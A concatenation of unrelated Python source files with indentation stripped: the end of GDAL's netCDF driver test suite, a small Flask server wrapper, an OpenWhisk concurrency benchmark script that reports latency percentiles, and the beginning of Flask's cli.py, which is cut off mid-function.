gdaltest.post_reason('GDAL did not open file')
return 'fail'
else:
name = ds.GetDriver().GetDescription()
ds = None
#return fail if did not open with the netCDF driver (i.e. HDF5Image)
if name != 'netCDF':
gdaltest.post_reason('netcdf driver did not open file')
return 'fail'
# test with Identify()
name = gdal.IdentifyDriver( ifile ).GetDescription()
if name != 'netCDF':
gdaltest.post_reason('netcdf driver did not identify file')
return 'fail'
else:
return 'skip'
return 'success'
###############################################################################
#check support for netcdf-4 - make sure hdf5 is not read by netcdf driver
def netcdf_17():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/groups.h5'
#skip test if Hdf5 is not enabled
if gdal.GetDriverByName( 'HDF5' ) is None and \
gdal.GetDriverByName( 'HDF5Image' ) is None:
return 'skip'
if gdaltest.netcdf_drv_has_nc4:
#test with Open()
ds = gdal.Open( ifile )
if ds is None:
gdaltest.post_reason('GDAL did not open hdf5 file')
return 'fail'
else:
name = ds.GetDriver().GetDescription()
ds = None
#return fail if opened with the netCDF driver
if name == 'netCDF':
gdaltest.post_reason('netcdf driver opened hdf5 file')
return 'fail'
# test with Identify()
name = gdal.IdentifyDriver( ifile ).GetDescription()
if name == 'netCDF':
gdaltest.post_reason('netcdf driver was identified for hdf5 file')
return 'fail'
else:
return 'skip'
return 'success'
###############################################################################
#check support for netcdf-4 classic (NC4C)
def netcdf_18():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/trmm-nc4c.nc'
if gdaltest.netcdf_drv_has_nc4:
# test with Open()
ds = gdal.Open( ifile )
if ds is None:
return 'fail'
else:
name = ds.GetDriver().GetDescription()
ds = None
#return fail if did not open with the netCDF driver (i.e. HDF5Image)
if name != 'netCDF':
return 'fail'
# test with Identify()
name = gdal.IdentifyDriver( ifile ).GetDescription()
if name != 'netCDF':
return 'fail'
else:
return 'skip'
return 'success'
###############################################################################
#check support for reading with DEFLATE compression, requires NC4
def netcdf_19():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
tst = gdaltest.GDALTest( 'NetCDF', 'data/trmm-nc4z.nc', 1, 50235,
filename_absolute = 1 )
result = tst.testOpen(skip_checksum = True)
return result
###############################################################################
#check support for writing with DEFLATE compression, requires NC4
def netcdf_20():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
#simple test with tiny file
return netcdf_test_deflate( 'data/utm.tif', 50235 )
###############################################################################
#check support for writing large file with DEFLATE compression
#if chunking is not defined properly within the netcdf driver, this test can take 1h
def netcdf_21():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
if not gdaltest.run_slow_tests():
return 'skip'
bigfile = 'tmp/cache/utm-big.tif'
sys.stdout.write('.')
sys.stdout.flush()
#create cache dir if absent
if not os.path.exists( 'tmp/cache' ):
os.mkdir( 'tmp/cache' )
#look for large gtiff in cache
if not os.path.exists( bigfile ):
#create large gtiff
if test_cli_utilities.get_gdalwarp_path() is None:
gdaltest.post_reason('gdalwarp not found')
return 'fail'
warp_cmd = test_cli_utilities.get_gdalwarp_path() +\
' -q -overwrite -r bilinear -ts 7680 7680 -of gtiff ' +\
'data/utm.tif ' + bigfile
try:
(ret, err) = gdaltest.runexternal_out_and_err( warp_cmd )
except:
gdaltest.post_reason('gdalwarp execution failed')
return 'fail'
if ( err != '' or ret != '' ):
gdaltest.post_reason('gdalwarp returned error\n'+str(ret)+' '+str(err))
return 'fail'
# test compression of the file, with a conservative timeout of 60 seconds
return netcdf_test_deflate( bigfile, 26695, 6, 60 )
###############################################################################
#check support for hdf4
def netcdf_22():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_hdf4:
return 'skip'
ifile = 'data/hdifftst2.hdf'
#suppress warning
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
ds = gdal.Open( 'NETCDF:' + ifile )
gdal.PopErrorHandler()
if ds is None:
gdaltest.post_reason('netcdf driver did not open hdf4 file')
return 'fail'
else:
ds = None
return 'success'
###############################################################################
#check support for hdf4 - make sure hdf4 file is not read by netcdf driver
def netcdf_23():
#don't skip if netcdf is not enabled in GDAL
#if gdaltest.netcdf_drv is None:
# return 'skip'
#if not gdaltest.netcdf_drv_has_hdf4:
# return 'skip'
#skip test if Hdf4 is not enabled in GDAL
if gdal.GetDriverByName( 'HDF4' ) is None and \
gdal.GetDriverByName( 'HDF4Image' ) is None:
return 'skip'
ifile = 'data/hdifftst2.hdf'
#test with Open()
ds = gdal.Open( ifile )
if ds is None:
gdaltest.post_reason('GDAL did not open hdf4 file')
return 'fail'
else:
name = ds.GetDriver().GetDescription()
ds = None
#return fail if opened with the netCDF driver
if name == 'netCDF':
gdaltest.post_reason('netcdf driver opened hdf4 file')
return 'fail'
# test with Identify()
name = gdal.IdentifyDriver( ifile ).GetDescription()
if name == 'netCDF':
gdaltest.post_reason('netcdf driver was identified for hdf4 file')
return 'fail'
return 'success'
###############################################################################
# check support for reading attributes (single values and array values)
def netcdf_24():
if gdaltest.netcdf_drv is None:
return 'skip'
vals_global = {'NC_GLOBAL#test' : 'testval', 'NC_GLOBAL#valid_range_i': '0,255',\
'NC_GLOBAL#valid_min' : '10.1' }
vals_band = { '_Unsigned' : 'true', 'valid_min' : '10.1', 'valid_range_b' : '1,10', \
'valid_range_d' : '0.1111112222222,255.555555555556', \
'valid_range_f' : '0.1111111,255.5556', \
'valid_range_s' : '0,255' }
return netcdf_check_vars( 'data/nc_vars.nc', vals_global, vals_band )
###############################################################################
# check support for writing attributes (single values and array values)
def netcdf_25():
if gdaltest.netcdf_drv is None:
return 'skip'
result = netcdf_test_copy( 'data/nc_vars.nc', 1, None, 'tmp/netcdf_25.nc' )
if result != 'success':
return result
vals_global = {'NC_GLOBAL#test' : 'testval', 'NC_GLOBAL#valid_range_i': '0,255',\
'NC_GLOBAL#valid_min' : '10.1' }
vals_band = { '_Unsigned' : 'true', 'valid_min' : '10.1', 'valid_range_b' : '1,10', \
'valid_range_d' : '0.1111112222222,255.555555555556', \
'valid_range_f' : '0.1111111,255.5556', \
'valid_range_s' : '0,255' }
return netcdf_check_vars( 'tmp/netcdf_25.nc', vals_global, vals_band )
###############################################################################
# check support for WRITE_BOTTOMUP file creation option
# use a dummy file with no lon/lat info to force a different checksum
# depending on y-axis order
def netcdf_26():
if gdaltest.netcdf_drv is None:
return 'skip'
#test default config
test = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4672 )
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
result = test.testCreateCopy(check_gt=0, check_srs=0, check_minmax = 0)
gdal.PopErrorHandler()
if result != 'success':
print('failed create copy without WRITE_BOTTOMUP')
return result
#test WRITE_BOTTOMUP=NO
test = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4855,
options=['WRITE_BOTTOMUP=NO'] )
result = test.testCreateCopy(check_gt=0, check_srs=0, check_minmax = 0)
if result != 'success':
print('failed create copy with WRITE_BOTTOMUP=NO')
return result
return 'success'
###############################################################################
# check support for GDAL_NETCDF_BOTTOMUP configuration option
def netcdf_27():
if gdaltest.netcdf_drv is None:
return 'skip'
#test default config
test = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4672 )
config_bak = gdal.GetConfigOption( 'GDAL_NETCDF_BOTTOMUP' )
gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', None )
result = test.testOpen()
gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', config_bak )
if result != 'success':
print('failed open without GDAL_NETCDF_BOTTOMUP')
return result
#test GDAL_NETCDF_BOTTOMUP=NO
test = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4855 )
config_bak = gdal.GetConfigOption( 'GDAL_NETCDF_BOTTOMUP' )
gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', 'NO' )
result = test.testOpen()
gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', config_bak )
if result != 'success':
print('failed open with GDAL_NETCDF_BOTTOMUP')
return result
return 'success'
###############################################################################
# check support for writing multi-dimensional files (helper function)
def netcdf_test_4dfile( ofile ):
# test result file has 8 bands and 0 subdasets (instead of 0 bands and 8 subdatasets)
ds = gdal.Open( ofile )
if ds is None:
gdaltest.post_reason( 'open of copy failed' )
return 'fail'
md = ds.GetMetadata( 'SUBDATASETS' )
subds_count = 0
if not md is None:
subds_count = len(md) / 2
if ds.RasterCount != 8 or subds_count != 0:
gdaltest.post_reason( 'copy has %d bands (expected 8) and has %d subdatasets'\
' (expected 0)' % (ds.RasterCount, subds_count ) )
return 'fail'
ds is None
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except:
print('NOTICE: ncdump not found')
return 'success'
if err == None or not 'netcdf library version' in err:
print('NOTICE: ncdump not found')
return 'success'
(ret, err) = gdaltest.runexternal_out_and_err( 'ncdump -h '+ ofile )
if ret == '' or err != '':
gdaltest.post_reason( 'ncdump failed' )
return 'fail'
# simple dimension tests using ncdump output
err = ""
if not 'int t(time, levelist, lat, lon) ;' in ret:
err = err + 'variable (t) has wrong dimensions or is missing\n'
if not 'levelist = 2 ;' in ret:
err = err + 'levelist dimension is missing or incorrect\n'
if not 'int levelist(levelist) ;' in ret:
err = err + 'levelist variable is missing or incorrect\n'
if not 'time = 4 ;' in ret:
err = err + 'time dimension is missing or incorrect\n'
if not 'double time(time) ;' in ret:
err = err + 'time variable is missing or incorrect\n'
# uncomment this to get full header in output
#if err != '':
# err = err + ret
if err != '':
gdaltest.post_reason( err )
return 'fail'
return 'success'
###############################################################################
# check support for writing multi-dimensional files using CreateCopy()
def netcdf_28():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/netcdf-4d.nc'
ofile = 'tmp/netcdf_28.nc'
# copy file
result = netcdf_test_copy( ifile, 0, None, ofile )
if result != 'success':
return 'fail'
# test file
return netcdf_test_4dfile( ofile )
###############################################################################
# Check support for writing multi-dimensional files using gdalwarp.
# Requires metadata copy support in gdalwarp (see bug #3898).
# First create a vrt file using gdalwarp, then copy file to netcdf.
# The workaround is (currently ??) necessary because dimension rolling code is
# in netCDFDataset::CreateCopy() and necessary dimension metadata
# is not saved to netcdf when using gdalwarp (as the driver does not write
# metadata to netcdf file with SetMetadata() and SetMetadataItem()).
def netcdf_29():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/netcdf-4d.nc'
ofile1 = 'tmp/netcdf_29.vrt'
ofile = 'tmp/netcdf_29.nc'
# create tif file using gdalwarp
if test_cli_utilities.get_gdalwarp_path() is None:
gdaltest.post_reason('gdalwarp not found')
return 'fail'
warp_cmd = '%s -q -overwrite -of vrt %s %s' %\
( test_cli_utilities.get_gdalwarp_path(), ifile, ofile1 )
try:
(ret, err) = gdaltest.runexternal_out_and_err( warp_cmd )
except:
gdaltest.post_reason('gdalwarp execution failed')
return 'fail'
if ( err != '' or ret != '' ):
gdaltest.post_reason('gdalwarp returned error\n'+str(ret)+' '+str(err))
return 'fail'
# copy vrt to netcdf, with proper dimension rolling
result = netcdf_test_copy( ofile1, 0, None, ofile )
if result != 'success':
return 'fail'
# test file
result = netcdf_test_4dfile( ofile )
if result == 'fail':
print('test failed - does gdalwarp support metadata copying?')
return result
###############################################################################
# check support for file with nan values (bug #4705)
def netcdf_30():
if gdaltest.netcdf_drv is None:
return 'skip'
tst = gdaltest.GDALTest( 'NetCDF', 'trmm-nan.nc', 1, 62519 )
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
result = tst.testOpen()
gdal.PopErrorHandler()
return result
###############################################################################
#check if 2x2 file has proper geotransform
#1 pixel (in width or height) still unsupported because we can't get the pixel dimensions
def netcdf_31():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/trmm-2x2.nc' )
prj = ds.GetProjection( )
gt = ds.GetGeoTransform( )
gt1 = ( -80.0, 0.25, 0.0, -19.5, 0.0, -0.25 )
if gt != gt1:
gdaltest.post_reason( 'Incorrect geotransform, got '+str(gt) )
return 'fail'
ds = None
return 'success'
###############################################################################
# Test NC_UBYTE write/read - netcdf-4 (FORMAT=NC4) only (#5053)
def netcdf_32():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
ifile = 'data/byte.tif'
ofile = 'tmp/netcdf_32.nc'
#gdal.SetConfigOption('CPL_DEBUG', 'ON')
# test basic read/write
result = netcdf_test_copy( ifile, 1, 4672, ofile, [ 'FORMAT=NC4' ] )
if result != 'success':
return 'fail'
result = netcdf_test_copy( ifile, 1, 4672, ofile, [ 'FORMAT=NC4C' ] )
if result != 'success':
return 'fail'
return 'success'
###############################################################################
# TEST NC_UBYTE metadata read - netcdf-4 (FORMAT=NC4) only (#5053)
def netcdf_33():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/nc_vars.nc'
ofile = 'tmp/netcdf_33.nc'
result = netcdf_test_copy( ifile, 1, None, ofile, [ 'FORMAT=NC4' ] )
if result != 'success':
return result
return netcdf_check_vars( 'tmp/netcdf_33.nc' )
###############################################################################
# check support for reading large file with chunking and DEFLATE compression
# if chunking is not supported within the netcdf driver, this test can take very long
def netcdf_34():
filename = 'utm-big-chunks.nc'
# this timeout is more than enough - on my system takes <1s with fix, about 25 seconds without
timeout = 5
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
if not gdaltest.run_slow_tests():
return 'skip'
try:
from multiprocessing import Process
except:
print('from multiprocessing import Process failed')
return 'skip'
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/netcdf/'+filename,filename):
return 'skip'
sys.stdout.write('.')
sys.stdout.flush()
tst = gdaltest.GDALTest( 'NetCDF', '../tmp/cache/'+filename, 1, 31621 )
#tst.testOpen()
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
proc = Process( target=tst.testOpen )
proc.start()
proc.join( timeout )
gdal.PopErrorHandler()
# if proc is alive after timeout we must terminate it, and return fail
# valgrind detects memory leaks when this occurs (although it should never happen)
if proc.is_alive():
proc.terminate()
print('testOpen() for file %s has reached timeout limit of %d seconds' % (filename, timeout) )
return 'fail'
return 'success'
###############################################################################
# test writing a long metadata > 8196 chars (bug #5113)
def netcdf_35():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/netcdf_fixes.nc'
ofile = 'tmp/netcdf_35.nc'
# copy file
result = netcdf_test_copy( ifile, 0, None, ofile )
if result != 'success':
return 'fail'
# test long metadata is copied correctly
ds = gdal.Open( ofile )
if ds is None:
gdaltest.post_reason( 'open of copy failed' )
return 'fail'
md = ds.GetMetadata( '' )
if not 'U#bla' in md:
gdaltest.post_reason( 'U#bla metadata absent' )
return 'fail'
bla = md['U#bla']
if not len(bla) == 9591:
gdaltest.post_reason( 'U#bla metadata is of length %d, expecting %d' % (len(bla),9591) )
return 'fail'
if not bla[-4:] == '_bla':
gdaltest.post_reason( 'U#bla metadata ends with [%s], expecting [%s]' % (bla[-4:], '_bla') )
return 'fail'
return 'success'
###############################################################################
# test for correct geotransform (bug #5114)
def netcdf_36():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/netcdf_fixes.nc'
ds = gdal.Open( ifile )
if ds is None:
gdaltest.post_reason( 'open failed' )
return 'fail'
gt = ds.GetGeoTransform( )
if gt is None:
gdaltest.post_reason( 'got no GeoTransform' )
return 'fail'
gt_expected = (-3.498749944898817, 0.0025000042385525173, 0.0, 46.61749818589952, 0.0, -0.001666598849826389)
if gt != gt_expected:
gdaltest.post_reason( 'got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)) )
return 'fail'
return 'success'
###############################################################################
# test for reading gaussian grid (bugs #4513 and #5118)
def netcdf_37():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/reduce-cgcms.nc'
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
ds = gdal.Open( ifile )
gdal.PopErrorHandler()
if ds is None:
gdaltest.post_reason( 'open failed' )
return 'fail'
gt = ds.GetGeoTransform( )
if gt is None:
gdaltest.post_reason( 'got no GeoTransform' )
return 'fail'
gt_expected = (-1.875, 3.75, 0.0, 89.01354337620016, 0.0, -3.7088976406750063)
if gt != gt_expected:
gdaltest.post_reason( 'got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)) )
return 'fail'
md = ds.GetMetadata( 'GEOLOCATION2' )
if not md or not 'Y_VALUES' in md:
gdaltest.post_reason( 'did not get 1D geolocation' )
return 'fail'
y_vals = md['Y_VALUES']
if not y_vals.startswith('{-87.15909455586265,-83.47893666931698,') \
or not y_vals.endswith(',83.47893666931698,87.15909455586265}'):
gdaltest.post_reason( 'got incorrect values in 1D geolocation' )
return 'fail'
return 'success'
###############################################################################
# test for correct geotransform of projected data in km units (bug #5118)
def netcdf_38():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/bug5118.nc'
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
ds = gdal.Open( ifile )
gdal.PopErrorHandler()
if ds is None:
gdaltest.post_reason( 'open failed' )
return 'fail'
gt = ds.GetGeoTransform( )
if gt is None:
gdaltest.post_reason( 'got no GeoTransform' )
return 'fail'
gt_expected = (-1659.3478178136488, 13.545000861672793, 0.0, 2330.054725283668, 0.0, -13.54499744233631)
if gt != gt_expected:
gdaltest.post_reason( 'got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)) )
return 'fail'
return 'success'
###############################################################################
# Test VRT and NETCDF:
def netcdf_39():
if gdaltest.netcdf_drv is None:
return 'skip'
shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
src_ds = gdal.Open('NETCDF:tmp/two_vars_scale_offset.nc:z')
out_ds = gdal.GetDriverByName('VRT').CreateCopy('tmp/netcdf_39.vrt', src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/two_vars_scale_offset.nc')
gdal.Unlink('tmp/netcdf_39.vrt')
if cs != 65463:
gdaltest.post_reason('failure')
print(cs)
return 'fail'
shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
src_ds = gdal.Open('NETCDF:"tmp/two_vars_scale_offset.nc":z')
out_ds = gdal.GetDriverByName('VRT').CreateCopy('tmp/netcdf_39.vrt', src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/two_vars_scale_offset.nc')
gdal.Unlink('tmp/netcdf_39.vrt')
if cs != 65463:
gdaltest.post_reason('failure')
print(cs)
return 'fail'
shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
src_ds = gdal.Open('NETCDF:"%s/tmp/two_vars_scale_offset.nc":z' % os.getcwd())
out_ds = gdal.GetDriverByName('VRT').CreateCopy('%s/tmp/netcdf_39.vrt' % os.getcwd(), src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/two_vars_scale_offset.nc')
gdal.Unlink('tmp/netcdf_39.vrt')
if cs != 65463:
gdaltest.post_reason('failure')
print(cs)
return 'fail'
src_ds = gdal.Open('NETCDF:"%s/data/two_vars_scale_offset.nc":z' % os.getcwd())
out_ds = gdal.GetDriverByName('VRT').CreateCopy('tmp/netcdf_39.vrt', src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/netcdf_39.vrt')
if cs != 65463:
gdaltest.post_reason('failure')
print(cs)
return 'fail'
return 'success'
###############################################################################
###############################################################################
# main tests list
gdaltest_list = [
netcdf_1,
netcdf_2,
netcdf_3,
netcdf_4,
netcdf_5,
netcdf_6,
netcdf_7,
netcdf_8,
netcdf_9,
netcdf_10,
netcdf_11,
netcdf_12,
netcdf_13,
netcdf_14,
netcdf_15,
netcdf_16,
netcdf_17,
netcdf_18,
netcdf_19,
netcdf_20,
netcdf_21,
netcdf_22,
netcdf_23,
netcdf_24,
netcdf_25,
netcdf_26,
netcdf_27,
netcdf_28,
netcdf_29,
netcdf_30,
netcdf_31,
netcdf_32,
netcdf_33,
netcdf_34,
netcdf_35,
netcdf_36,
netcdf_37,
netcdf_38,
netcdf_39
]
###############################################################################
# basic file creation tests
init_list = [ \
('byte.tif', 1, 4672, None, []),
('byte_signed.tif', 1, 4672, None, ['PIXELTYPE=SIGNEDBYTE']),
('int16.tif', 1, 4672, None, []),
('int32.tif', 1, 4672, None, []),
('float32.tif', 1, 4672, None, []),
('float64.tif', 1, 4672, None, [])
]
# Some tests we don't need to do for each type.
item = init_list[0]
ut = gdaltest.GDALTest( 'netcdf', item[0], item[1], item[2], options=item[4] )
#test geotransform and projection
gdaltest_list.append( (ut.testSetGeoTransform, item[0]) )
gdaltest_list.append( (ut.testSetProjection, item[0]) )
#SetMetadata() not supported
#gdaltest_list.append( (ut.testSetMetadata, item[0]) )
# Others we do for each pixel type.
for item in init_list:
ut = gdaltest.GDALTest( 'netcdf', item[0], item[1], item[2], options=item[4] )
if ut is None:
print( 'GTiff tests skipped' )
gdaltest_list.append( (ut.testCreateCopy, item[0]) )
gdaltest_list.append( (ut.testCreate, item[0]) )
gdaltest_list.append( (ut.testSetNoDataValue, item[0]) )
###############################################################################
# other tests
if __name__ == '__main__':
gdaltest.setup_run( 'netcdf' )
gdaltest.run_tests( gdaltest_list )
#make sure we cleanup
gdaltest.clean_tmp()
gdaltest.summarize()
|
server.py | import threading
from flask import Flask
from werkzeug.serving import make_server
class Server:
def __init__(self, app: Flask, host: str, port: int):
self.server = make_server(host, port, app)
self.context = app.app_context()
self.context.push()
def run(self):
self.server.serve_forever()
def stop(self):
threading.Thread(target=self.server.shutdown).start()
|
run.py | import os
import threading
import time
import sys, getopt
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./single-cold_warm.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes,actionName,params):
for j in range(warmupTimes):
r = os.popen("wsk -i action invoke %s %s --result --blocking" %(actionName,params))
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "nodecomplex"
actionName = "node-complex"
params = ""
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes,actionName,params))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,startTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + \
',' + clientResult[j][2] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','','']
i = 0
count = 0
while count < 3:
while i < len(line):
if line[i].isdigit():
parsedTimes[count] = line[i:i+13]
i += 13
count += 1
continue
i += 1
parsedResults.append(parsedTimes)
return parsedResults
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warup_times: %d\n" % (client, loop, warmup))
resultfile.write("%d requests finished in %.2f seconds\n" %(requestNum, (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main() |
cli.py | # -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
from __future__ import print_function
import ast
import inspect
import os
import re
import ssl
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock, Thread
import click
from werkzeug.utils import import_string
from . import __version__
from ._compat import getargspec, iteritems, reraise, text_type
from .globals import current_app
from .helpers import get_debug_flag, get_env, get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ('app', 'application'):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [
v for k, v in iteritems(module.__dict__) if isinstance(v, Flask)
]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
'Detected multiple Flask applications in module "{module}". Use '
'"FLASK_APP={module}:name" to specify the correct '
'one.'.format(module=module.__name__)
)
# Search for app factory functions.
for attr_name in ('create_app', 'make_app'):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
'Detected factory "{factory}" in module "{module}", but '
'could not call it without arguments. Use '
'"FLASK_APP=\'{module}:{factory}(args)\'" to specify '
'arguments.'.format(
factory=attr_name, module=module.__name__
)
)
raise NoAppException(
'Failed to find Flask application or factory in module "{module}". '
'Use "FLASK_APP={module}:name to specify one.'.format(
module=module.__name__
)
)
def call_factory(script_info, app_factory, arguments=()):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
args_spec = getargspec(app_factory)
arg_names = args_spec.args
arg_defaults = args_spec.defaults
if 'script_info' in arg_names:
return app_factory(*arguments, script_info=script_info)
elif arguments:
return app_factory(*arguments)
elif not arguments and len(arg_names) == 1 and arg_defaults is None:
return app_factory(script_info)
return app_factory()
def _called_with_wrong_args(factory):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param factory: the factory function that was called
:return: true if the call failed
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is factory.__code__:
# in the factory, it was called successfully
return False
tb = tb.tb_next
# didn't reach the factory
return True
finally:
del tb
def find_app_by_string(script_info, module, app_name):
"""Checks if the given string is a variable name or a function. If it is a
function, it checks for specified arguments and whether it takes a
``script_info`` argument and calls the function with the appropriate
arguments.
"""
from flask import Flask
match = re.match(r'^ *([^ ()]+) *(?:\((.*?) *,? *\))? *$', app_name)
if not match:
raise NoAppException(
'"{name}" is not a valid variable name or function '
'expression.'.format(name=app_name)
)
name, args = match.groups()
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(e.args[0])
if inspect.isfunction(attr):
if args:
try:
args = ast.literal_eval('({args},)'.format(args=args))
except (ValueError, SyntaxError)as e:
raise NoAppException(
'Could not parse the arguments in '
